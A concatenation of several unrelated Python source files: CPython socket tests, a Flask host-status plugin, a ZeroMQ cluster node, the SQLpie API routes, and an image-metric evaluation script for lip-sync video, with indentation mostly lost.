self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
@requireAttrs(socket, "send_fds")
@requireAttrs(socket, "recv_fds")
@requireAttrs(socket, "AF_UNIX")
class SendRecvFdsTests(unittest.TestCase):
def testSendAndRecvFds(self):
def close_pipes(pipes):
for fd1, fd2 in pipes:
os.close(fd1)
os.close(fd2)
def close_fds(fds):
for fd in fds:
os.close(fd)
# send 10 file descriptors
pipes = [os.pipe() for _ in range(10)]
self.addCleanup(close_pipes, pipes)
fds = [rfd for rfd, wfd in pipes]
# use a UNIX socket pair to exchange file descriptors locally
sock1, sock2 = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
with sock1, sock2:
socket.send_fds(sock1, [MSG], fds)
# request more data and file descriptors than expected
msg, fds2, flags, addr = socket.recv_fds(sock2, len(MSG) * 2, len(fds) * 2)
self.addCleanup(close_fds, fds2)
self.assertEqual(msg, MSG)
self.assertEqual(len(fds2), len(fds))
self.assertEqual(flags, 0)
# don't test addr
# test that file descriptors are connected
for index, fds in enumerate(pipes):
rfd, wfd = fds
os.write(wfd, str(index).encode())
for index, rfd in enumerate(fds2):
data = os.read(rfd, 100)
self.assertEqual(data, str(index).encode())
def setUpModule():
thread_info = threading_helper.threading_setup()
unittest.addModuleCleanup(threading_helper.threading_cleanup, *thread_info)
if __name__ == "__main__":
unittest.main()
|
manager.py
|
import os
import sched
import threading
import time
from flask import current_app, request
from ..conf.config import Constant, HttpMethod
from ..exceptions import ErrorResponse
from ..exceptions.error_code import MsgCode
from ..exceptions.log_msg import ErrorMsg, InfoMsg
from ..models import model_init_app
from ..services import redis_conn
from ..services.host_status import query_flask_state_host, record_flask_state_host
from ..utils.auth import auth_method, auth_user
from ..utils.file_lock import Lock
from ..utils.format_conf import format_address, format_sec
from ..utils.logger import DefaultLogger, logger
from .response_methods import make_response_content
ONE_MINUTE_SECONDS = 60
def init_app(app, interval=Constant.DEFAULT_SECONDS, log_instance=None):
"""
Plugin entry
:param app: Flask app
:param interval: record interval
:param log_instance: custom logger object
"""
logger.set(log_instance or DefaultLogger().get())
app.add_url_rule('/v0/state/hoststatus', endpoint='state_host_status', view_func=query_flask_state,
methods=[HttpMethod.POST.value])
init_db(app)
init_redis(app)
model_init_app(app)
# Timing recorder
interval = format_sec(interval)
t = threading.Thread(target=record_timer, args=(app, interval,))
    t.daemon = True
t.start()
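# Editor-added usage sketch for init_app(); the Flask app construction and the
# SQLite URI below are illustrative assumptions, not part of the plugin itself.
def _example_bootstrap():
    from flask import Flask
    example_app = Flask(__name__)
    example_app.config['SQLALCHEMY_BINDS'] = {
        Constant.DEFAULT_BIND_SQLITE: 'sqlite:///flask_state_host.db',  # hypothetical path
    }
    init_app(example_app, interval=60)  # record host status every 60 seconds
    return example_app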
def init_redis(app):
redis_state = app.config.get('REDIS_CONF', {})
if not redis_state.get('REDIS_STATUS'):
return
redis_conf_keys = ['REDIS_HOST', 'REDIS_PORT', 'REDIS_PASSWORD']
redis_conf = {key: value for key, value in redis_state.items() if key in redis_conf_keys}
redis_conn.set_redis(redis_conf)
def init_db(app):
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
if not app.config.get('SQLALCHEMY_BINDS', {}).get(Constant.DEFAULT_BIND_SQLITE):
raise KeyError(ErrorMsg.LACK_SQLITE.get_msg())
app.config['SQLALCHEMY_BINDS'][Constant.DEFAULT_BIND_SQLITE] = format_address(
app.config['SQLALCHEMY_BINDS'].get(Constant.DEFAULT_BIND_SQLITE))
def record_timer(app, interval):
app.lock_flask_state = Lock.get_file_lock()
with app.app_context():
try:
current_app.lock_flask_state.acquire()
logger.info(InfoMsg.ACQUIRED_LOCK.get_msg('. process ID: %d' % os.getpid()))
s = sched.scheduler(time.time, time.sleep)
in_time = time.time()
target_time = int(int((time.time()) / ONE_MINUTE_SECONDS + 1) * ONE_MINUTE_SECONDS)
time.sleep(ONE_MINUTE_SECONDS - in_time % ONE_MINUTE_SECONDS)
record_flask_state_host(interval)
while True:
target_time += interval
now_time = time.time()
s.enter(target_time - now_time, 1, record_flask_state_host, (interval,))
s.run()
except BlockingIOError:
pass
except Exception as e:
current_app.lock_flask_state.release()
raise e
@auth_user
@auth_method
def query_flask_state():
"""
Query the local state and redis status
:return: flask response
"""
try:
b2d = request.json
if not isinstance(b2d, dict):
            logger.warning(ErrorMsg.DATA_TYPE_ERROR.get_msg(
                '. The target type is {}, not {}'.format(dict.__name__, type(b2d).__name__)))
return make_response_content(ErrorResponse(MsgCode.JSON_FORMAT_ERROR))
time_quantum = b2d.get('timeQuantum')
return make_response_content(resp=query_flask_state_host(time_quantum))
except Exception as e:
logger.exception(e)
return make_response_content(ErrorResponse(MsgCode.UNKNOWN_ERROR), http_status=500)
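# Editor-added sketch of exercising the endpoint registered in init_app(); the test
# client, the 30-second 'timeQuantum' and any credentials expected by the
# auth_user/auth_method decorators are assumptions for illustration only.
def _example_query(flask_test_client):
    return flask_test_client.post('/v0/state/hoststatus', json={'timeQuantum': 30})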
|
node0.py
|
import zmq
import time
import threading
import json
name = 'bob'
def cluster_manager(context, join_uri):
    nodes = [name]
    join_sock = context.socket(zmq.REP)
    join_sock.bind(join_uri)
    while True:
        message = join_sock.recv()
        req = json.loads(message)
        if 'type' in req and req['type'] == 'JOIN' and req['node'] not in nodes:
            nodes.append(req['node'])
        resp = {'type': 'ACK', 'nodes': nodes}
        # send_string() encodes to bytes; under Python 3 a plain send() of a str raises TypeError
        join_sock.send_string(json.dumps(resp))
ctx = zmq.Context(1)
thread = threading.Thread(target=cluster_manager, args=(ctx, 'tcp://*:5560'))
thread.start()
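# Editor-added sketch (not in the original node0.py): how a peer might join the
# cluster managed above. The node name 'alice' and the localhost endpoint are
# illustrative; the JOIN/ACK message shapes mirror cluster_manager().
def join_cluster(node_name='alice', manager_uri='tcp://localhost:5560'):
    req_sock = zmq.Context.instance().socket(zmq.REQ)
    req_sock.connect(manager_uri)
    req_sock.send_string(json.dumps({'type': 'JOIN', 'node': node_name}))
    ack = json.loads(req_sock.recv())  # e.g. {'type': 'ACK', 'nodes': ['bob', 'alice']}
    req_sock.close()
    return ack['nodes']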
|
application.py
|
# -*- coding: utf-8 -*-
"""
SQLpie™ is a simple, sleek, intuitive, and powerful API platform for prototyping projects that have data intelligence needs.
SQLpie is written entirely in Python and sits on top of a MySQL database, which makes it easy to maintain; most of the data-processing heavy lifting is done in SQL, a proven and reasonably scalable technology.
SQLpie License (MIT License)
Copyright (c) 2011-2016 André Lessa, http://sqlpie.com
See LICENSE file.
"""
from flask import Flask, request, jsonify, g, Response
from flask import current_app
from flask import render_template
from flaskext.mysql import MySQL
import json, threading, time, sys, traceback, os, logging, random
import sqlpie
application = Flask(__name__)
sqlpie_config = sqlpie.Config().load()
setup = sqlpie.DBSetup(sqlpie_config)
setup.init(application)
mysql = setup.db()
@application.before_request
def db_connect():
try:
g.conn = mysql.connect()
g.cursor = g.conn.cursor()
except:
pass
@application.teardown_request
def db_disconnect(response):
try:
g.cursor.close()
g.conn.close()
except:
pass
return response
#
# Routes
#
@application.route('/')
def index():
return 'Hello world, this is SQLpie.'
#
# Documents
#
@application.route("/document/<command>", methods=['POST'])
def document(command):
command = command.lower()
if command == "put":
resp = sqlpie.DocumentController.put(request)
elif command == "get":
resp = sqlpie.DocumentController.get(request)
elif command == "remove":
resp = sqlpie.DocumentController.remove(request)
elif command == "reset":
resp = sqlpie.DocumentController.reset(request)
else:
resp = Response(None, status=404, mimetype='application/json')
return resp
#
# Observations
#
@application.route("/observation/<command>", methods=['POST'])
def observation(command):
command = command.lower()
if command == "put":
resp = sqlpie.ObservationController.put(request)
elif command == "get":
resp = sqlpie.ObservationController.get(request)
elif command == "remove":
resp = sqlpie.ObservationController.remove(request)
elif command == "reset":
resp = sqlpie.ObservationController.reset(request)
else:
resp = Response(None, status=404, mimetype='application/json')
return resp
#
# Other
#
@application.route("/docs", methods=["GET"])
def docs():
return sqlpie.HealthController.docs(request)
@application.route("/stats", methods=["GET","POST"])
def stats():
return sqlpie.HealthController.stats(request)
@application.route("/ping", methods=["GET","POST"])
def ping():
return sqlpie.HealthController.ping(request)
#
# Search
#
@application.route("/service/index", methods=["POST"])
def service_index():
return sqlpie.SearchController.service_index(request)
@application.route("/service/search", methods=["POST"])
def service_search():
return sqlpie.SearchController.service_search(request)
#
# Classifier
#
@application.route("/service/classifier/init", methods=["POST"])
def service_classifier():
return sqlpie.ClassifierController.classifier_init(request)
@application.route("/service/classifier/train", methods=["POST"])
def service_classifier_train():
return sqlpie.ClassifierController.classifier_train(request)
@application.route("/service/classifier/clear", methods=["POST"])
def service_classifier_clear():
return sqlpie.ClassifierController.classifier_clear(request)
@application.route("/service/classifier/reset", methods=["POST"])
def service_classifier_reset():
return sqlpie.ClassifierController.classifier_reset(request)
@application.route("/service/classifier/predict", methods=["POST"])
def service_classifier_predict():
return sqlpie.ClassifierController.classifier_predict(request)
@application.route("/service/classifier/predictions", methods=["POST"])
def service_classifier_predictions():
return sqlpie.ClassifierController.classifier_predictions(request)
#
# Matching
#
@application.route("/service/matching/", methods=["POST"])
def service_matching():
return sqlpie.MatchingController.matching(request)
#
# Recommendation
#
@application.route("/service/collaborative/recommendation", methods=["POST"])
def service_recommend():
return sqlpie.CollaborativeController.service_recommend(request)
@application.route("/service/collaborative/similarity", methods=["POST"])
def service_similarity():
return sqlpie.CollaborativeController.service_similarity(request)
#
# Summarization
#
@application.route("/service/summarization", methods=["POST"])
def service_summarization():
return sqlpie.SummarizationController.service_summarization(request)
#
# Caching
#
@application.route("/caching/initialize", methods=["POST"])
def caching_initialize():
return sqlpie.CachingController.caching_initialize(request)
@application.route("/caching/add", methods=["POST"])
def caching_add():
return sqlpie.CachingController.caching_add(request)
@application.route("/caching/put", methods=["POST"])
def caching_put():
return sqlpie.CachingController.caching_put(request)
@application.route("/caching/get", methods=["POST"])
def caching_get():
return sqlpie.CachingController.caching_get(request)
@application.route("/caching/remove", methods=["POST"])
def caching_remove():
return sqlpie.CachingController.caching_remove(request)
@application.route("/caching/flush", methods=["POST"])
def caching_flush():
return sqlpie.CachingController.caching_flush(request)
@application.route("/caching/reset", methods=["POST"])
def caching_reset():
return sqlpie.CachingController.caching_reset(request)
@application.route("/caching/destroy", methods=["POST"])
def caching_destroy():
return sqlpie.CachingController.caching_destroy(request)
#
# Global Vars
#
if "options" in sqlpie_config:
options = sqlpie_config["options"]
sqlpie.global_cache[sqlpie.Config.OPTIONS] = sqlpie.Caching(sqlpie.Config.OPTIONS,1)
sqlpie.global_cache[sqlpie.Config.OPTIONS].put("options", options)
search_stopwords = sqlpie.Config.get(sqlpie.Config.SEARCH_STOPWORDS)
if search_stopwords is not None:
sqlpie.global_cache[sqlpie.Config.STOPWORDS] = sqlpie.Caching(sqlpie.Config.STOPWORDS,5000)
for stopword_file in search_stopwords:
words = sqlpie.Config.load_data(stopword_file)
for w in words:
sqlpie.global_cache[sqlpie.Config.STOPWORDS].add(w.strip())
#
# Background Threads
#
def handle_indexing(app, mysql):
with app.app_context():
while(True):
try:
g.conn = mysql.connect()
g.cursor = g.conn.cursor()
g.conn.begin()
                # run the indexing service every 300 seconds
time.sleep(300)
sqlpie.Indexer().index_documents()
g.conn.commit()
except Exception as e:
if sqlpie.Util.is_debug():
traceback.print_tb(sys.exc_info()[2])
try:
g.conn.rollback()
except:
pass
finally:
# if the MySQL Server is not running, this will fail.
try:
g.cursor.close()
g.conn.close()
except:
pass
if sqlpie.DBSetup().environment() != "test":
if os.environ.get('WERKZEUG_RUN_MAIN') != 'true':
threads = []
if sqlpie.Config.get(sqlpie.Config.BACKGROUND_INDEXER) == True:
t = threading.Thread(name='handle_indexing', target=handle_indexing, args=(application, mysql))
            t.daemon = True
threads.append(t)
t.start()
# for t in threads:
# t.join()
if sqlpie.Util.is_debug():
application.debug=True
if __name__ == "__main__":
application.run(host="0.0.0.0", debug=sqlpie.Util.is_debug(), port=sqlpie.Config.get(sqlpie.Config.SERVER_PORT))
|
evaluation_matrix.py
|
import os
import pickle
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import glob
import torch
import scipy.misc
import numpy
import argparse
import cv2
from scipy import signal
from scipy import ndimage
from collections import OrderedDict
import multiprocessing
import math
from scipy.ndimage import gaussian_filter
from numpy.lib.stride_tricks import as_strided as ast
from skimage.measure import compare_ssim as ssim_f
from PIL import Image
import numpy as np
from skimage import feature
import math
from scipy.ndimage import correlate
import imutils
import dlib
from imutils import face_utils
import csv
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--sample_dir",
type=str,
default="/u/lchen63/lrw/test_result")
# default="/u/lchen63/grid/test_result")
parser.add_argument("--model_name",
type=str,
default="musk_r_lstm_newloss_row")
parser.add_argument("--pickle_path",
type = str,
default ='/u/lchen63/lrw/test_pickle/')
parser.add_argument("--num_thread",
type=int,
default=5)
return parser.parse_args()
def get_pickle(config):
sample_dir = config.sample_dir
test_data = []
print ('------------------------')
for i in range(1000):
tmp = {}
tmp["real_path"] = []
tmp["fake_path"] = []
for j in range(8):
real_path = os.path.join(sample_dir, 'single', 'real_%d.png'%(i*8+j))
fake_path = os.path.join(sample_dir, 'single', 'fake_%d.png'%(i*8+j))
if not os.path.exists(real_path):
print (real_path)
elif not os.path.exists(fake_path):
print (fake_path)
else:
tmp["real_path"].append(real_path)
tmp["fake_path"].append(fake_path)
test_data.append(tmp)
with open(os.path.join(config.pickle_path,'{}.pkl'.format(config.model_name)), 'wb') as handle:
pickle.dump(test_data, handle, protocol=pickle.HIGHEST_PROTOCOL)
def get_pickle_xface(csv_file, config):
    _csv = open(csv_file, 'r', newline='')
reader = csv.reader(_csv)
test_data = []
for line in reader:
fid = line[2]
fimg_path = line[1].replace('.wav','_' + fid + '.jpg')
print (fimg_path)
rimg_path = line[0]
print (rimg_path)
tmp = {}
tmp["real_path"] = [rimg_path]
tmp["fake_path"] = [fimg_path]
test_data.append(tmp)
with open(os.path.join(config.pickle_path,'{}.pkl'.format(config.model_name)), 'wb') as handle:
pickle.dump(test_data, handle, protocol=pickle.HIGHEST_PROTOCOL)
##########################################################
def get_pickle_yousaidthat(csv_file, config):
    _csv = open(csv_file, 'r', newline='')
reader = csv.reader(_csv)
test_data = []
for line in reader:
fid = line[6]
for i in range(1,30):
fimg_path = fid + 'fake_%03d.jpg'%i
rimg_path = fid + '%03d.jpg'%i
if not os.path.exists(fimg_path):
print (fimg_path)
continue
elif not os.path.exists(rimg_path):
print (rimg_path)
continue
else:
tmp = {}
tmp["real_path"] = [rimg_path]
tmp["fake_path"] = [fimg_path]
test_data.append(tmp)
with open(os.path.join(config.pickle_path,'{}.pkl'.format(config.model_name)), 'wb') as handle:
pickle.dump(test_data, handle, protocol=pickle.HIGHEST_PROTOCOL)
################## CPBD ##############
def block_process(A, block):
    block_contrast = np.zeros((A.shape[0] // block[0], A.shape[1] // block[1]), dtype=np.int32)
flatten_contrast = list()
for i in range(0, A.shape[0], block[0]):
for j in range(0, A.shape[1], block[1]):
block_view = A[i:i+block[0], j:j+block[1]]
block_view = np.max(block_view) - np.min(block_view)
flatten_contrast.append(block_view)
block_contrast = np.array(flatten_contrast).reshape(block_contrast.shape)
return block_contrast
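def _block_process_example():
    # Editor-added sanity check: on a 4x4 array split into 2x2 blocks, each output
    # cell is that block's max - min contrast, so the result here is [[3, 3], [0, 0]].
    A = np.array([[1, 2, 5, 6],
                  [3, 4, 7, 8],
                  [0, 0, 9, 9],
                  [0, 0, 9, 9]])
    return block_process(A, [2, 2])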
def fspecial_gauss(size, sigma):
"""Function to mimic the 'fspecial' gaussian MATLAB function
"""
x, y = numpy.mgrid[-size//2 + 1:size//2 + 1, -size//2 + 1:size//2 + 1]
g = numpy.exp(-((x**2 + y**2)/(2.0*sigma**2)))
return g/g.sum()
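def _fspecial_gauss_example():
    # Editor-added sketch: the 11x11, sigma=1.5 window used by ssim_ff() below is a
    # normalised Gaussian kernel, so its entries sum to 1 (up to float rounding).
    window = fspecial_gauss(11, 1.5)
    return window.shape, float(window.sum())  # ((11, 11), ~1.0)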
def ssim_ff(img1, img2, cs_map=False):
"""Return the Structural Similarity Map corresponding to input images img1
and img2 (images are assumed to be uint8)
This function attempts to mimic precisely the functionality of ssim.m a
MATLAB provided by the author's of SSIM
https://ece.uwaterloo.ca/~z70wang/research/ssim/ssim_index.m
"""
img1 = img1.astype(numpy.float64)
img2 = img2.astype(numpy.float64)
size = 11
sigma = 1.5
window = fspecial_gauss(size, sigma)
K1 = 0.01
K2 = 0.03
L = 255 #bitdepth of image
C1 = (K1*L)**2
C2 = (K2*L)**2
mu1 = signal.fftconvolve(window, img1, mode='valid')
mu2 = signal.fftconvolve(window, img2, mode='valid')
mu1_sq = mu1*mu1
mu2_sq = mu2*mu2
mu1_mu2 = mu1*mu2
sigma1_sq = signal.fftconvolve(window, img1*img1, mode='valid') - mu1_sq
sigma2_sq = signal.fftconvolve(window, img2*img2, mode='valid') - mu2_sq
sigma12 = signal.fftconvolve(window, img1*img2, mode='valid') - mu1_mu2
if cs_map:
return (((2*mu1_mu2 + C1)*(2*sigma12 + C2))/((mu1_sq + mu2_sq + C1)*
(sigma1_sq + sigma2_sq + C2)),
(2.0*sigma12 + C2)/(sigma1_sq + sigma2_sq + C2))
else:
return ((2*mu1_mu2 + C1)*(2*sigma12 + C2))/((mu1_sq + mu2_sq + C1)*
(sigma1_sq + sigma2_sq + C2))
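def _ssim_example(real_path, fake_path):
    # Editor-added sketch: ssim_ff() returns an SSIM map over the valid window
    # positions; averaging it gives a single score. The two paths are assumed to
    # point at same-sized images that can be converted to greyscale.
    img1 = np.array(Image.open(real_path).convert('L'))
    img2 = np.array(Image.open(fake_path).convert('L'))
    return float(ssim_ff(img1, img2).mean())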
def cpbd_compute(image):
if isinstance(image, str):
image = Image.open(image)
image = image.convert('L')
img = np.array(image, dtype=np.float32)
m, n = img.shape
threshold = 0.002
beta = 3.6
rb = 64
rc = 64
max_blk_row_idx = int(m/rb)
max_blk_col_idx = int(n/rc)
widthjnb = np.array([np.append(5 * np.ones((1, 51)), 3*np.ones((1, 205)))])
total_num_edges = 0
hist_pblur = np.zeros(101, dtype=np.float64)
input_image_canny_edge = feature.canny(img)
input_image_sobel_edge = matlab_sobel_edge(img)
width = marziliano_method(input_image_sobel_edge, img)
# print width
for i in range(1, max_blk_row_idx+1):
for j in range(1, max_blk_col_idx+1):
rows = slice(rb*(i-1), rb*i)
cols = slice(rc*(j-1), rc*j)
decision = get_edge_blk_decision(input_image_canny_edge[rows, cols], threshold)
if decision == 1:
local_width = width[rows, cols]
local_width = local_width[np.nonzero(local_width)]
blk_contrast = block_process(img[rows, cols], [rb, rc]) + 1
blk_jnb = widthjnb[0, int(blk_contrast)-1]
prob_blur_detection = 1 - math.e ** (-np.power(np.abs(np.true_divide(local_width, blk_jnb)), beta))
for k in range(1, local_width.size+1):
temp_index = int(round(prob_blur_detection[k-1] * 100)) + 1
hist_pblur[temp_index-1] = hist_pblur[temp_index-1] + 1
total_num_edges = total_num_edges + 1
if total_num_edges != 0:
hist_pblur = hist_pblur / total_num_edges
else:
hist_pblur = np.zeros(hist_pblur.shape)
sharpness_metric = np.sum(hist_pblur[0:63])
return sharpness_metric
def marziliano_method(E, A):
# print E
edge_with_map = np.zeros(A.shape)
gy, gx = np.gradient(A)
M, N = A.shape
angle_A = np.zeros(A.shape)
for m in range(1, M+1):
for n in range(1, N+1):
if gx[m-1, n-1] != 0:
angle_A[m-1, n-1] = math.atan2(gy[m-1,n-1], gx[m-1,n-1]) * (180/np.pi)
if gx[m-1, n-1] == 0 and gy[m-1, n-1] == 0:
angle_A[m-1, n-1] = 0
if gx[m-1, n-1] == 0 and gy[m-1, n-1] == np.pi/2:
angle_A[m-1, n-1] = 90
if angle_A.size != 0:
angle_Arnd = 45 * np.round(angle_A/45.0)
# print angle_Arnd
count = 0
for m in range(2, M):
for n in range(2, N):
if E[m-1, n-1] == 1:
if angle_Arnd[m-1, n-1] == 180 or angle_Arnd[m-1, n-1] == -180:
count += 1
for k in range(0, 101):
posy1 = n-1-k
posy2 = n - 2 - k
if posy2 <= 0:
break
if A[m-1, posy2-1] - A[m-1, posy1-1] <= 0:
break
width_count_side1 = k + 1
for k in range(0, 101):
negy1 = n + 1 + k
negy2 = n + 2 + k
if negy2 > N:
break
if A[m-1, negy2-1] > A[m-1, negy1-1]:
break
width_count_side2 = k + 1
edge_with_map[m-1, n-1] = width_count_side1 + width_count_side2
elif angle_Arnd[m-1, n-1] == 0:
count += 1
for k in range(0, 101):
posy1 = n+1+k
posy2 = n + 2 + k
if posy2 > N:
break
# print m, posy2
if A[m-1, posy2-1] <= A[m-1, posy1-1]:
break
width_count_side1 = k + 1
for k in range(0, 101):
negy1 = n -1-k
negy2 = n -2 -k
if negy2 <=0:
break
if A[m-1, negy2-1] >= A[m-1, negy1-1]:
break
width_count_side2 = k + 1
edge_with_map[m-1, n-1] = width_count_side1 + width_count_side2
return edge_with_map
def get_edge_blk_decision(im_in, T):
m, n = im_in.shape
L = m * n
im_edge_pixels = np.sum(im_in)
im_out = im_edge_pixels > (L * T)
return im_out
def matlab_sobel_edge(img):
mask = np.array([[1, 0, -1], [2, 0, -2], [1, 0, -1]]) / 8.0
bx = correlate(img, mask)
b = bx*bx
# print b
b = b > 4.0
    return np.array(b, dtype=int)
################################################################################################
def generating_landmark_lips(test_inf):
# image = cv2.imread(os.path.join(config.sample_dir,'bg.jpg'))
# image_real = image.copy()
# image_fake = image.copy()
# original = np.array([181,237])
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor('../basics/shape_predictor_68_face_landmarks.dat')
for inx in range(len(test_inf)):
real_paths = test_inf[inx]["real_path"]
fake_paths = test_inf[inx]["fake_path"]
# print len(real_paths)
print ("{}/{}".format(inx, len(test_inf)))
for i in range(len(real_paths)):
rp = real_paths[i]
fp = fake_paths[i]
# print fp
temp_r = rp.split('/')
# temp_f = fp.split('/')
if not os.path.exists( os.path.join(config.sample_dir,'landmark/real64/' + temp_r[-2])):
os.mkdir( os.path.join(config.sample_dir,'landmark/real64/' + temp_r[-2]))
if not os.path.exists(os.path.join(config.sample_dir,'landmark/fake64/' + temp_r[-2])):
os.mkdir(os.path.join(config.sample_dir,'landmark/fake64/' + temp_r[-2]))
lm_r = os.path.join(config.sample_dir,'landmark/real64/' + temp_r[-2] + '/' + temp_r[-1][:-4] + '.npy' )
lm_f = os.path.join(config.sample_dir,'landmark/fake64/' + temp_r[-2] + '/' + temp_r[-1][:-4] + '.npy' )
i_lm_r = os.path.join(config.sample_dir,'landmark/real64/' + temp_r[-2] + '/' + temp_r[-1][:-4] + '.jpg' )
i_lm_f = os.path.join(config.sample_dir,'landmark/fake64/' + temp_r[-2] + '/' + temp_r[-1][:-4] + '.jpg' )
image_real = cv2.imread(rp)
image_fake = cv2.imread(fp)
# image_real[237:301,181:245,:] = real_mask
# image_fake[237:301,181:245,:] = fake_mask
real_gray = cv2.cvtColor(image_real, cv2.COLOR_BGR2GRAY)
real_rects = detector(real_gray, 1)
fake_gray = cv2.cvtColor(image_fake,cv2.COLOR_BGR2GRAY)
fake_rects = detector(fake_gray, 1)
if len(real_rects) == 0 or len(fake_rects) == 0:
print('--------------------------------')
for (i,rect) in enumerate(fake_rects):
shape = predictor(fake_gray, rect)
shape = face_utils.shape_to_np(shape)
for (name, (i, j)) in face_utils.FACIAL_LANDMARKS_IDXS.items():
# print name
if name != 'mouth':
continue
clone = image_fake.copy()
for (x, y) in shape[i:j]:
cv2.circle(clone, (x, y), 1, (0, 255, 0), -1)
cv2.imwrite(i_lm_f, clone)
mouth_land = shape[i:j].copy()
original = np.sum(mouth_land,axis=0) / 20.0
# print (mouth_land)
mouth_land = mouth_land - original
np.save(lm_f,mouth_land)
for (i,rect) in enumerate(real_rects):
shape = predictor(real_gray, rect)
shape = face_utils.shape_to_np(shape)
for (name, (i, j)) in face_utils.FACIAL_LANDMARKS_IDXS.items():
# print name
if name != 'mouth':
continue
clone = image_real.copy()
for (x, y) in shape[i:j]:
cv2.circle(clone, (x, y), 1, (0, 255, 0), -1)
cv2.imwrite(i_lm_r, clone)
mouth_land = shape[i:j].copy()
original = np.sum(mouth_land,axis=0) / 20.0
# print (mouth_land)
mouth_land = mouth_land - original
np.save(lm_r,mouth_land)
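# Splits the test set into roughly num_thread chunks and runs
# generating_landmark_lips on each chunk in its own process.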
def generate_landmarks(pickle_path):
num_thread = config.num_thread
test_inf = pickle.load(open(pickle_path, "rb"))
datas = []
batch_size = max(1, len(test_inf) // num_thread)
temp = []
if not os.path.exists( os.path.join(config.sample_dir,'landmark')):
os.mkdir( os.path.join(config.sample_dir,'landmark'))
if not os.path.exists( os.path.join(config.sample_dir,'landmark/real64')):
os.mkdir( os.path.join(config.sample_dir,'landmark/real64'))
if not os.path.exists( os.path.join(config.sample_dir,'landmark/fake64')):
os.mkdir( os.path.join(config.sample_dir,'landmark/fake64'))
for i,d in enumerate(test_inf):
temp.append(d)
if (i+1) % batch_size ==0:
datas.append(temp)
temp = []
for i in range(len(datas)):
process = multiprocessing.Process(target = generating_landmark_lips,args = (datas[i],))
process.start()
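# Pairs up the saved real/fake mouth-landmark .npy files, computes the summed
# Euclidean distance between corresponding landmark points for each pair, writes
# per-pair distances to distance.txt and prints the average distance.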
def compare_landmarks(path, config):
fake_path = os.path.join(path, 'fake64')
real_path = os.path.join(path, 'real64')
# fakes = os.walk(fake_path)
rps = []
fps = []
for video in os.listdir(fake_path):
for name in os.listdir( os.path.join(fake_path, video) ):
if name[-3:] == 'npy':
if os.path.exists(os.path.join(real_path , video, name)):
rps.append(os.path.join(real_path , video, name))
fps.append(os.path.join(fake_path , video, name))
# for root, dirs, files in os.walk(fake_path):
# for name in files:
# # print name
# if name[-3:] == 'npy':
# print ('===')
# print (os.path.join(root, name))
# fps.append(os.path.join(root, name))
# rps.append(real_path + '/' + config.model_name + '/' + name)
# fps.append(fake_path + '/' +config.model_name + '/' + name)
# for root, dirs, files in os.walk(real_path):
# for name in files:
# # print name
# if name[-3:] == 'npy':
# # print ('=++=')
# # print (os.path.join(root, name))
# rps.append(os.path.join(root, name))
print (len(rps))
print (len(fps))
dis_txt = open(path + 'distance.txt','w')
distances = []
# print len(rps)
for inx in range(len(rps)):
# try:
rp = np.load(rps[inx])
fp = np.load(fps[inx])
# print rp.shape
# print fp.shape
dis = (rp-fp)**2
dis = np.sum(dis,axis=1)
dis = np.sqrt(dis)
dis = np.sum(dis,axis=0)
distances.append(dis)
dis_txt.write(rps[inx] + '\t' + str(dis) + '\n')
# except:
# continue
average_distance = sum(distances) / len(rps)
print(average_distance)
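# Peak signal-to-noise ratio between two images; returns 100 for identical
# images (zero MSE) to avoid a division by zero, e.g. psnr_f(img, img) == 100.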
def psnr_f(img1, img2):
mse = np.mean( (img1 - img2) ** 2 )
if mse == 0:
return 100
PIXEL_MAX = 255.0
return 20 * math.log10(PIXEL_MAX / math.sqrt(mse))
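# Computes SSIM on the colour frames and PSNR on their grayscale versions for
# every real/fake pair in the pickle, logs per-frame values to ssim.txt and
# returns the averages.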
def compare_ssim(pickle_path):
test_inf = pickle.load(open(pickle_path, "rb"))
dis_txt = open(os.path.join(config.sample_dir, 'ssim.txt'), 'w')
ssims = []
# msssims = []
psnrs =[]
for i,d in enumerate(test_inf):
print (i)
# try:
fake_paths = d['fake_path']
real_paths = d['real_path']
for inx in range(len(fake_paths)):
f_i = cv2.imread(fake_paths[inx])
r_i = cv2.imread(real_paths[inx])
r_i = cv2.resize(r_i, (256,256), interpolation = cv2.INTER_AREA)
f_i = cv2.resize(f_i, (256,256), interpolation = cv2.INTER_AREA)
ssim = ssim_f(f_i,r_i,multichannel=True)
f_i = cv2.cvtColor(f_i, cv2.COLOR_BGR2GRAY)
r_i = cv2.cvtColor(r_i, cv2.COLOR_BGR2GRAY)
psnr = psnr_f(f_i,r_i)
# msssim = msssim_f(f_i,r_i)
psnrs.append(psnr)
ssims.append(ssim)
# print "ssim: {:.4f},\t psnr: {:.4f}\t msssim: {:.4f}".format( ssim, psnr,ssim)
dis_txt.write(fake_paths[inx] + "\t ssim: {:.4f},\t psnr: {:.4f}\t msssim: {:.4f}".format( ssim, psnr,ssim) + '\n')
# except:
# print ('gggg')
# continue
average_ssim = sum(ssims) / len(ssims)
average_psnr = sum(psnrs) / len(psnrs)
# average_msssim = sum(msssims) / len(msssims)
print "Aeverage: \t ssim: {:.4f},\t psnr: {:.4f}".format( average_ssim, average_psnr,average_ssim)
return average_ssim, average_psnr
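# CPBD (cumulative probability of blur detection) sharpness score for each
# generated frame; per-frame scores are written to cpdb.txt and the average is
# returned.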
def compare_cpdb(pickle_path):
test_inf = pickle.load(open(pickle_path, "rb"))
dis_txt = open(os.path.join(config.sample_dir, 'cpdb.txt'), 'w')
r_cpdb = []
f_cpdb = []
for i,d in enumerate(test_inf):
fake_paths = d['fake_path']
# real_paths = d['real_path']
for inx in range(len(fake_paths)):
